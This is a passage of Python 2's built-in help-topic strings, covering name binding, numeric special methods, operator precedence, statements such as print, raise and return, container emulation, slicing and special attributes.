class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. 
This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. 
Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n=================================\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n', 'numbers': u'\nNumeric literals\n****************\n\nThere are four types of numeric literals: plain integers, long\nintegers, floating point numbers, and imaginary numbers. There are no\ncomplex literals (complex numbers can be formed by adding a real\nnumber and an imaginary number).\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator \'"-"\' and the\nliteral "1".\n', 'numeric-types': u'\nEmulating numeric types\n***********************\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). 
For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. 
If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n', 'objects': u'\nObjects, values and types\n*************************\n\n*Objects* are Python\'s abstraction for data. All data in a Python\nprogram is represented by objects or by relations between objects. (In\na sense, and in conformance to Von Neumann\'s model of a "stored\nprogram computer," code is also represented by objects.)\n\nEvery object has an identity, a type and a value. An object\'s\n*identity* never changes once it has been created; you may think of it\nas the object\'s address in memory. The \'"is"\' operator compares the\nidentity of two objects; the "id()" function returns an integer\nrepresenting its identity (currently implemented as its address). An\nobject\'s *type* is also unchangeable. [1] An object\'s type determines\nthe operations that the object supports (e.g., "does it have a\nlength?") and also defines the possible values for objects of that\ntype. The "type()" function returns an object\'s type (which is an\nobject itself). The *value* of some objects can change. Objects\nwhose value can change are said to be *mutable*; objects whose value\nis unchangeable once they are created are called *immutable*. (The\nvalue of an immutable container object that contains a reference to a\nmutable object can change when the latter\'s value is changed; however\nthe container is still considered immutable, because the collection of\nobjects it contains cannot be changed. So, immutability is not\nstrictly the same as having an unchangeable value, it is more subtle.)\nAn object\'s mutability is determined by its type; for instance,\nnumbers, strings and tuples are immutable, while dictionaries and\nlists are mutable.\n\nObjects are never explicitly destroyed; however, when they become\nunreachable they may be garbage-collected. 
An implementation is\nallowed to postpone garbage collection or omit it altogether --- it is\na matter of implementation quality how garbage collection is\nimplemented, as long as no objects are collected that are still\nreachable.\n\n**CPython implementation detail:** CPython currently uses a reference-\ncounting scheme with (optional) delayed detection of cyclically linked\ngarbage, which collects most objects as soon as they become\nunreachable, but is not guaranteed to collect garbage containing\ncircular references. See the documentation of the "gc" module for\ninformation on controlling the collection of cyclic garbage. Other\nimplementations act differently and CPython may change. Do not depend\non immediate finalization of objects when they become unreachable (ex:\nalways close files).\n\nNote that the use of the implementation\'s tracing or debugging\nfacilities may keep objects alive that would normally be collectable.\nAlso note that catching an exception with a \'"try"..."except"\'\nstatement may keep objects alive.\n\nSome objects contain references to "external" resources such as open\nfiles or windows. It is understood that these resources are freed\nwhen the object is garbage-collected, but since garbage collection is\nnot guaranteed to happen, such objects also provide an explicit way to\nrelease the external resource, usually a "close()" method. Programs\nare strongly recommended to explicitly close such objects. The\n\'"try"..."finally"\' statement provides a convenient way to do this.\n\nSome objects contain references to other objects; these are called\n*containers*. Examples of containers are tuples, lists and\ndictionaries. The references are part of a container\'s value. In\nmost cases, when we talk about the value of a container, we imply the\nvalues, not the identities of the contained objects; however, when we\ntalk about the mutability of a container, only the identities of the\nimmediately contained objects are implied. So, if an immutable\ncontainer (like a tuple) contains a reference to a mutable object, its\nvalue changes if that mutable object is changed.\n\nTypes affect almost all aspects of object behavior. Even the\nimportance of object identity is affected in some sense: for immutable\ntypes, operations that compute new values may actually return a\nreference to any existing object with the same type and value, while\nfor mutable objects this is not allowed. E.g., after "a = 1; b = 1",\n"a" and "b" may or may not refer to the same object with the value\none, depending on the implementation, but after "c = []; d = []", "c"\nand "d" are guaranteed to refer to two different, unique, newly\ncreated empty lists. (Note that "c = d = []" assigns the same object\nto both "c" and "d".)\n', 'operator-summary': u'\nOperator precedence\n*******************\n\nThe following table summarizes the operator precedences in Python,\nfrom lowest precedence (least binding) to highest precedence (most\nbinding). Operators in the same box have the same precedence. Unless\nthe syntax is explicitly given, operators are binary. 
Operators in\nthe same box group left to right (except for comparisons, including\ntests, which all have the same precedence and chain from left to right\n--- see section Comparisons --- and exponentiation, which groups from\nright to left).\n\n+-------------------------------------------------+---------------------------------------+\n| Operator | Description |\n+=================================================+=======================================+\n| "lambda" | Lambda expression |\n+-------------------------------------------------+---------------------------------------+\n| "if" -- "else" | Conditional expression |\n+-------------------------------------------------+---------------------------------------+\n| "or" | Boolean OR |\n+-------------------------------------------------+---------------------------------------+\n| "and" | Boolean AND |\n+-------------------------------------------------+---------------------------------------+\n| "not" "x" | Boolean NOT |\n+-------------------------------------------------+---------------------------------------+\n| "in", "not in", "is", "is not", "<", "<=", ">", | Comparisons, including membership |\n| ">=", "<>", "!=", "==" | tests and identity tests |\n+-------------------------------------------------+---------------------------------------+\n| "|" | Bitwise OR |\n+-------------------------------------------------+---------------------------------------+\n| "^" | Bitwise XOR |\n+-------------------------------------------------+---------------------------------------+\n| "&" | Bitwise AND |\n+-------------------------------------------------+---------------------------------------+\n| "<<", ">>" | Shifts |\n+-------------------------------------------------+---------------------------------------+\n| "+", "-" | Addition and subtraction |\n+-------------------------------------------------+---------------------------------------+\n| "*", "/", "//", "%" | Multiplication, division, remainder |\n| | [8] |\n+-------------------------------------------------+---------------------------------------+\n| "+x", "-x", "~x" | Positive, negative, bitwise NOT |\n+-------------------------------------------------+---------------------------------------+\n| "**" | Exponentiation [9] |\n+-------------------------------------------------+---------------------------------------+\n| "x[index]", "x[index:index]", | Subscription, slicing, call, |\n| "x(arguments...)", "x.attribute" | attribute reference |\n+-------------------------------------------------+---------------------------------------+\n| "(expressions...)", "[expressions...]", "{key: | Binding or tuple display, list |\n| value...}", "`expressions...`" | display, dictionary display, string |\n| | conversion |\n+-------------------------------------------------+---------------------------------------+\n\n-[ Footnotes ]-\n\n[1] In Python 2.3 and later releases, a list comprehension "leaks"\n the control variables of each "for" it contains into the\n containing scope. However, this behavior is deprecated, and\n relying on it will not work in Python 3.\n\n[2] While "abs(x%y) < abs(y)" is true mathematically, for floats\n it may not be true numerically due to roundoff. For example, and\n assuming a platform on which a Python float is an IEEE 754 double-\n precision number, in order that "-1e-100 % 1e100" have the same\n sign as "1e100", the computed result is "-1e-100 + 1e100", which\n is numerically exactly equal to "1e100". 
The function\n "math.fmod()" returns a result whose sign matches the sign of the\n first argument instead, and so returns "-1e-100" in this case.\n Which approach is more appropriate depends on the application.\n\n[3] If x is very close to an exact integer multiple of y, it\'s\n possible for "floor(x/y)" to be one larger than "(x-x%y)/y" due to\n rounding. In such cases, Python returns the latter result, in\n order to preserve that "divmod(x,y)[0] * y + x % y" be very close\n to "x".\n\n[4] While comparisons between unicode strings make sense at the\n byte level, they may be counter-intuitive to users. For example,\n the strings "u"\\u00C7"" and "u"\\u0043\\u0327"" compare differently,\n even though they both represent the same unicode character (LATIN\n CAPITAL LETTER C WITH CEDILLA). To compare strings in a human\n recognizable way, compare using "unicodedata.normalize()".\n\n[5] The implementation computes this efficiently, without\n constructing lists or sorting.\n\n[6] Earlier versions of Python used lexicographic comparison of\n the sorted (key, value) lists, but this was very expensive for the\n common case of comparing for equality. An even earlier version of\n Python compared dictionaries by identity only, but this caused\n surprises because people expected to be able to test a dictionary\n for emptiness by comparing it to "{}".\n\n[7] Due to automatic garbage-collection, free lists, and the\n dynamic nature of descriptors, you may notice seemingly unusual\n behaviour in certain uses of the "is" operator, like those\n involving comparisons between instance methods, or constants.\n Check their documentation for more info.\n\n[8] The "%" operator is also used for string formatting; the same\n precedence applies.\n\n[9] The power operator "**" binds less tightly than an arithmetic\n or bitwise unary operator on its right, that is, "2**-1" is "0.5".\n', 'pass': u'\nThe "pass" statement\n********************\n\n pass_stmt ::= "pass"\n\n"pass" is a null operation --- when it is executed, nothing happens.\nIt is useful as a placeholder when a statement is required\nsyntactically, but no code needs to be executed, for example:\n\n def f(arg): pass # a function that does nothing (yet)\n\n class C: pass # a class with no methods (yet)\n', 'power': u'\nThe power operator\n******************\n\nThe power operator binds more tightly than unary operators on its\nleft; it binds less tightly than unary operators on its right. The\nsyntax is:\n\n power ::= primary ["**" u_expr]\n\nThus, in an unparenthesized sequence of power and unary operators, the\noperators are evaluated from right to left (this does not constrain\nthe evaluation order for the operands): "-1**2" results in "-1".\n\nThe power operator has the same semantics as the built-in "pow()"\nfunction, when called with two arguments: it yields its left argument\nraised to the power of its right argument. The numeric arguments are\nfirst converted to a common type. The result type is that of the\narguments after coercion.\n\nWith mixed operand types, the coercion rules for binary arithmetic\noperators apply. For int and long int operands, the result has the\nsame type as the operands (after coercion) unless the second argument\nis negative; in that case, all arguments are converted to float and a\nfloat result is delivered. For example, "10**2" returns "100", but\n"10**-2" returns "0.01". 
(This last feature was added in Python 2.2.\nIn Python 2.1 and before, if both arguments were of integer types and\nthe second argument was negative, an exception was raised).\n\nRaising "0.0" to a negative power results in a "ZeroDivisionError".\nRaising a negative number to a fractional power results in a\n"ValueError".\n', 'print': u'\nThe "print" statement\n*********************\n\n print_stmt ::= "print" ([expression ("," expression)* [","]]\n | ">>" expression [("," expression)+ [","]])\n\n"print" evaluates each expression in turn and writes the resulting\nobject to standard output (see below). If an object is not a string,\nit is first converted to a string using the rules for string\nconversions. The (resulting or original) string is then written. A\nspace is written before each object is (converted and) written, unless\nthe output system believes it is positioned at the beginning of a\nline. This is the case (1) when no characters have yet been written\nto standard output, (2) when the last character written to standard\noutput is a whitespace character except "\' \'", or (3) when the last\nwrite operation on standard output was not a "print" statement. (In\nsome cases it may be functional to write an empty string to standard\noutput for this reason.)\n\nNote: Objects which act like file objects but which are not the\n built-in file objects often do not properly emulate this aspect of\n the file object\'s behavior, so it is best not to rely on this.\n\nA "\'\\n\'" character is written at the end, unless the "print" statement\nends with a comma. This is the only action if the statement contains\njust the keyword "print".\n\nStandard output is defined as the file object named "stdout" in the\nbuilt-in module "sys". If no such object exists, or if it does not\nhave a "write()" method, a "RuntimeError" exception is raised.\n\n"print" also has an extended form, defined by the second portion of\nthe syntax described above. This form is sometimes referred to as\n""print" chevron." In this form, the first expression after the ">>"\nmust evaluate to a "file-like" object, specifically an object that has\na "write()" method as described above. With this extended form, the\nsubsequent expressions are printed to this file object. If the first\nexpression evaluates to "None", then "sys.stdout" is used as the file\nfor output.\n', 'raise': u'\nThe "raise" statement\n*********************\n\n raise_stmt ::= "raise" [expression ["," expression ["," expression]]]\n\nIf no expressions are present, "raise" re-raises the last exception\nthat was active in the current scope. If no exception is active in\nthe current scope, a "TypeError" exception is raised indicating that\nthis is an error (if running under IDLE, a "Queue.Empty" exception is\nraised instead).\n\nOtherwise, "raise" evaluates the expressions to get three objects,\nusing "None" as the value of omitted expressions. The first two\nobjects are used to determine the *type* and *value* of the exception.\n\nIf the first object is an instance, the type of the exception is the\nclass of the instance, the instance itself is the value, and the\nsecond object must be "None".\n\nIf the first object is a class, it becomes the type of the exception.\nThe second object is used to determine the exception value: If it is\nan instance of the class, the instance becomes the exception value. 
If\nthe second object is a tuple, it is used as the argument list for the\nclass constructor; if it is "None", an empty argument list is used,\nand any other object is treated as a single argument to the\nconstructor. The instance so created by calling the constructor is\nused as the exception value.\n\nIf a third object is present and not "None", it must be a traceback\nobject (see section The standard type hierarchy), and it is\nsubstituted instead of the current location as the place where the\nexception occurred. If the third object is present and not a\ntraceback object or "None", a "TypeError" exception is raised. The\nthree-expression form of "raise" is useful to re-raise an exception\ntransparently in an except clause, but "raise" with no expressions\nshould be preferred if the exception to be re-raised was the most\nrecently active exception in the current scope.\n\nAdditional information on exceptions can be found in section\nExceptions, and information about handling exceptions is in section\nThe try statement.\n', 'return': u'\nThe "return" statement\n**********************\n\n return_stmt ::= "return" [expression_list]\n\n"return" may only occur syntactically nested in a function definition,\nnot within a nested class definition.\n\nIf an expression list is present, it is evaluated, else "None" is\nsubstituted.\n\n"return" leaves the current function call with the expression list (or\n"None") as return value.\n\nWhen "return" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nfunction.\n\nIn a generator function, the "return" statement is not allowed to\ninclude an "expression_list". In that context, a bare "return"\nindicates that the generator is done and will cause "StopIteration" to\nbe raised.\n', 'sequence-types': u'\nEmulating container types\n*************************\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilar to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. 
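\n\nFor instance, a minimal read-only sequence can be emulated with just\n"__len__()" and "__getitem__()" (a hedged sketch; the "Row" class name\nis illustrative, not part of the protocol):\n\n   class Row:\n       def __init__(self, values):\n           self._values = list(values)\n       def __len__(self):\n           return len(self._values)\n       def __getitem__(self, index):\n           # list indexing raises IndexError past the end, as required\n           return self._values[index]\n\n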
It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent of "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n Called to implement the built-in function "len()". Should return\n the length of the object, an integer ">=" 0. Also, an object that\n doesn\'t define a "__nonzero__()" method and whose "__len__()"\n method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n Called to implement evaluation of "self[key]". For sequence types,\n the accepted keys should be integers and slice objects. Note that\n the special interpretation of negative indexes (if the class wishes\n to emulate a sequence type) is up to the "__getitem__()" method. If\n *key* is of an inappropriate type, "TypeError" may be raised; if of\n a value outside the set of indexes for the sequence (after any\n special interpretation of negative values), "IndexError" should be\n raised. For mapping types, if *key* is missing (not in the\n container), "KeyError" should be raised.\n\n Note: "for" loops expect that an "IndexError" will be raised for\n illegal indexes to allow proper detection of the end of the\n sequence.\n\nobject.__missing__(self, key)\n\n Called by "dict"."__getitem__()" to implement "self[key]" for dict\n subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n Called to implement assignment to "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support changes to the values for keys, or if new keys\n can be added, or for sequences if elements can be replaced. The\n same exceptions should be raised for improper *key* values as for\n the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n Called to implement deletion of "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support removal of keys, or for sequences if elements\n can be removed from the sequence. The same exceptions should be\n raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n This method is called when an iterator is required for a container.\n This method should return a new iterator object that can iterate\n over all the objects in the container. For mappings, it should\n iterate over the keys of the container, and should also be made\n available as the method "iterkeys()".\n\n Iterator objects also need to implement this method; they are\n required to return themselves. For more information on iterator\n objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n Called (if present) by the "reversed()" built-in to implement\n reverse iteration. It should return a new iterator object that\n iterates over all the objects in the container in reverse order.\n\n If the "__reversed__()" method is not provided, the "reversed()"\n built-in will fall back to using the sequence protocol ("__len__()"\n and "__getitem__()"). 
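\n\n For instance, "reversed()" will accept an object that defines only\n these two methods (an illustrative sketch; "Countdown" is a\n hypothetical class):\n\n    >>> class Countdown(object):\n    ...     def __len__(self):\n    ...         return 3\n    ...     def __getitem__(self, index):\n    ...         if not 0 <= index < 3:\n    ...             raise IndexError(index)\n    ...         return 3 - index\n    ...\n    >>> list(reversed(Countdown()))\n    [1, 2, 3]\n\n 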
Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n', 'shifting': u'\nShifting operations\n*******************\n\nThe shifting operations have lower priority than the arithmetic\noperations:\n\n shift_expr ::= a_expr | shift_expr ( "<<" | ">>" ) a_expr\n\nThese operators accept plain or long integers as arguments. The\narguments are converted to a common type. They shift the first\nargument to the left or right by the number of bits given by the\nsecond argument.\n\nA right shift by *n* bits is defined as division by "pow(2, n)". A\nleft shift by *n* bits is defined as multiplication with "pow(2, n)".\nNegative shift counts raise a "ValueError" exception.\n\nNote: In the current implementation, the right-hand operand is\n required to be at most "sys.maxsize". If the right-hand operand is\n larger than "sys.maxsize" an "OverflowError" exception is raised.\n', 'slicings': u'\nSlicings\n********\n\nA slicing selects a range of items in a sequence object (e.g., a\nstring, tuple or list). Slicings may be used as expressions or as\ntargets in assignment or "del" statements. The syntax for a slicing:\n\n slicing ::= simple_slicing | extended_slicing\n simple_slicing ::= primary "[" short_slice "]"\n extended_slicing ::= primary "[" slice_list "]"\n slice_list ::= slice_item ("," slice_item)* [","]\n slice_item ::= expression | proper_slice | ellipsis\n proper_slice ::= short_slice | long_slice\n short_slice ::= [lower_bound] ":" [upper_bound]\n long_slice ::= short_slice ":" [stride]\n lower_bound ::= expression\n upper_bound ::= expression\n stride ::= expression\n ellipsis ::= "..."\n\nThere is ambiguity in the formal syntax here: anything that looks like\nan expression list also looks like a slice list, so any subscription\ncan be interpreted as a slicing. Rather than further complicating the\nsyntax, this is disambiguated by defining that in this case the\ninterpretation as a subscription takes priority over the\ninterpretation as a slicing (this is the case if the slice list\ncontains no proper slice nor ellipses). Similarly, when the slice\nlist has exactly one short slice and no trailing comma, the\ninterpretation as a simple slicing takes priority over that as an\nextended slicing.\n\nThe semantics for a simple slicing are as follows. The primary must\nevaluate to a sequence object. The lower and upper bound expressions,\nif present, must evaluate to plain integers; defaults are zero and the\n"sys.maxint", respectively. If either bound is negative, the\nsequence\'s length is added to it. 
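\n\nFor example (an illustrative sketch of the bound adjustment just\ndescribed):\n\n   >>> s = "abcde"\n   >>> s[-4:-2]        # len(s) == 5, so this is equivalent to s[1:3]\n   \'bc\'\n\n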
The slicing now selects all items\nwith index *k* such that "i <= k < j" where *i* and *j* are the\nspecified lower and upper bounds. This may be an empty sequence. It\nis not an error if *i* or *j* lie outside the range of valid indexes\n(such items don\'t exist so they aren\'t selected).\n\nThe semantics for an extended slicing are as follows. The primary\nmust evaluate to a mapping object, and it is indexed with a key that\nis constructed from the slice list, as follows. If the slice list\ncontains at least one comma, the key is a tuple containing the\nconversion of the slice items; otherwise, the conversion of the lone\nslice item is the key. The conversion of a slice item that is an\nexpression is that expression. The conversion of an ellipsis slice\nitem is the built-in "Ellipsis" object. The conversion of a proper\nslice is a slice object (see section The standard type hierarchy)\nwhose "start", "stop" and "step" attributes are the values of the\nexpressions given as lower bound, upper bound and stride,\nrespectively, substituting "None" for missing expressions.\n', 'specialattrs': u'\nSpecial Attributes\n******************\n\nThe implementation adds a few special read-only attributes to several\nobject types, where they are relevant. Some of these are not reported\nby the "dir()" built-in function.\n\nobject.__dict__\n\n A dictionary or other mapping object used to store an object\'s\n (writable) attributes.\n\nobject.__methods__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\nobject.__members__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\ninstance.__class__\n\n The class to which a class instance belongs.\n\nclass.__bases__\n\n The tuple of base classes of a class object.\n\nclass.__name__\n\n The name of the class or type.\n\nThe following attributes are only supported by *new-style class*es.\n\nclass.__mro__\n\n This attribute is a tuple of classes that are considered when\n looking for base classes during method resolution.\n\nclass.mro()\n\n This method can be overridden by a metaclass to customize the\n method resolution order for its instances. It is called at class\n instantiation, and its result is stored in "__mro__".\n\nclass.__subclasses__()\n\n Each new-style class keeps a list of weak references to its\n immediate subclasses. This method returns a list of all those\n references still alive. Example:\n\n >>> int.__subclasses__()\n [<type \'bool\'>]\n\n-[ Footnotes ]-\n\n[1] Additional information on these special methods may be found\n in the Python Reference Manual (Basic customization).\n\n[2] As a consequence, the list "[1, 2]" is considered equal to\n "[1.0, 2.0]", and similarly for tuples.\n\n[3] They must have since the parser can\'t tell the type of the\n operands.\n\n[4] Cased characters are those with general category property\n being one of "Lu" (Letter, uppercase), "Ll" (Letter, lowercase),\n or "Lt" (Letter, titlecase).\n\n[5] To format only a tuple you should therefore provide a\n singleton tuple whose only element is the tuple to be formatted.\n\n[6] The advantage of leaving the newline on is that returning an\n empty string is then an unambiguous EOF indication. 
